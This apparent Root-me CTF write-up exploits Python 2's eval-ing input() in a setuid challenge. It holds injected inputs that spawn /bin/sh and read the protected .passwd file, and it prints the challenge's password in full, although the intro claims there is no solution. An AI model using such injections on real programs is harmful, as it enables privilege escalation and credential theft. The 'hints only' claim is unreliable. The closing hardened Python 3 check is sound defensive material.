To comply with the write-up rule of root-me.org, in this write-up I have just listed hints related to this challenge. There is no solution or correct answer here. I ask for your understanding.
<Source code>
#!/usr/bin/python2
import sys

def youLose():
    print "Try again ;-)"
    sys.exit(1)

try:
    # Python 2 input() evaluates the typed text as a Python expression
    p = input("Please enter password : ")
except:
    youLose()

# Read the expected password from the protected file
with open(".passwd") as f:
    passwd = f.readline().strip()

try:
    if (p == int(passwd)):
        print "Well done ! You can validate with this password !"
except:
    youLose()
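This source code uses the “input()” function, which has a critical vulnerability: in Python 2, input() is equivalent to eval(raw_input()), so the text entered at the prompt is evaluated as a Python expression. The post I wrote before about the “input()” function may help you.
LET'S START SOLVING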
app-script-ch6@challenge02:~$ ls
ch6.py setuid-wrapper setuid-wrapper.c
app-script-ch6@challenge02:~$ ls -al
total 40
dr-xr-x--- 2 app-script-ch6-cracked app-script-ch6 4096 Dec 10 2021 .
drwxr-xr-x 25 root root 4096 Sep 5 2023 ..
-r-------- 1 root root 898 Dec 10 2021 ._perms
-rw-r----- 1 root root 42 Dec 10 2021 .git
-rw-r----- 1 app-script-ch6 app-script-ch6 54 Dec 10 2021 .motd
-r-------- 1 app-script-ch6-cracked app-script-ch6-cracked 33 Dec 10 2021 .passwd
-r-xr-x--- 1 app-script-ch6 app-script-ch6 365 Dec 10 2021 ch6.py
-rwsr-x--- 1 app-script-ch6-cracked app-script-ch6 7260 Dec 10 2021 setuid-wrapper
-r--r----- 1 app-script-ch6-cracked app-script-ch6 207 Dec 10 2021 setuid-wrapper.c
app-script-ch6@challenge02:~$ ./setuid-wrapper
Please enter password : __import__("os").execl("/bin/sh","sh")
$ ls
ch6.py setuid-wrapper setuid-wrapper.c
$ ./setuid-wrapper
Please enter password : sys.stdout.write(open(".passwd").readline())
13373439872909134298363103573901
$ ./setuid-wrapper
Please enter password : 13373439872909134298363103573901
Well Done ! Your Password Is Valid
$
PASSWORD : 13373439872909134298363103573901
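The hardened counterpart of ch6.py, as an added example that is not part of the challenge or of the original write-up: it is written for Python 3, where input() returns a plain string, and it never evaluates the entered text. The digits-only pattern, the 64-character limit and the constant-time comparison are assumptions added here.

```python
#!/usr/bin/env python3
# Added example (not the challenge's code): the same check with the entered
# text treated as data only. In Python 2 the equivalent fix is raw_input().
import hmac
import re
import sys

SECRET_FILE = ".passwd"               # same file name as in ch6.py
DIGITS = re.compile(r"[0-9]{1,64}")   # assumption: the secret is a decimal number


def read_secret(path=SECRET_FILE):
    """Read the expected password (first line of the secret file)."""
    with open(path) as f:
        return f.readline().strip()


def check_password(entered, secret):
    """Return True only if `entered` is the decimal string stored as `secret`.

    Nothing here calls eval(), so expressions typed at the prompt stay inert text.
    """
    entered = entered.strip()
    if not DIGITS.fullmatch(entered):
        return False
    # Constant-time comparison, so timing does not leak matching prefixes.
    return hmac.compare_digest(entered.encode(), secret.encode())


def main():
    try:
        entered = input("Please enter password : ")   # Python 3: returns a str
        secret = read_secret()
    except (EOFError, OSError):
        print("Try again ;-)")
        return 1
    if check_password(entered, secret):
        print("Well done ! You can validate with this password !")
        return 0
    print("Try again ;-)")
    return 1


if __name__ == "__main__":
    sys.exit(main())
```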